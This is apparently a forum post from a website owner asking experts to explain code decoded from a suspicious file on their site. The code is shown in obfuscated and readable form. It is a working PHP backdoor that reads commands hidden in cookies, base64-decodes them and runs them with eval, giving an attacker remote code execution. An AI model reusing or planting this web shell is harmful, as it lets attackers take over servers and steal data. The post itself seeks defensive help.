Hi,
I found an encoded file from our website and when I decoded it, I got this code
$c='count';$a=$_COOKIE;if(reset($a)=='th' && $c($a)>3){$k='3Password55';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\\w=\\s]/','/\\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '';}
in more human readable manner code
$c='count';
$a=$_COOKIE;
if(reset($a)=='th' && $c($a)>3)
{
$k='3Password55';echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\\w=\\s]/','/\\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '';
}
Can somebody tell me what it is?
I know the fact that it destroying our website but not sure the detailed information about it.
I would appreciate if somebody could explain the code above.
Experts, please share your knowledge for us to protect our website and what to do to prevent it.
Kind regards